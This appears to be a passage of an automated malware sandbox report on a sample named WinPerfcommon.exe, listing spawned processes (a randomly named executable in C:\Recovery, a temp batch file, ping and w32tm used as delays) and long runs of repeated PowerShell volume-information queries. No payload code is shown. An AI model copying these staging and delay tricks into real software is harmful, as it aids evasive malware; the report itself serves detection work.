                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeQueries volume information: C:\Users\user\Desktop\WinPerfcommon.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeQueries volume information: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
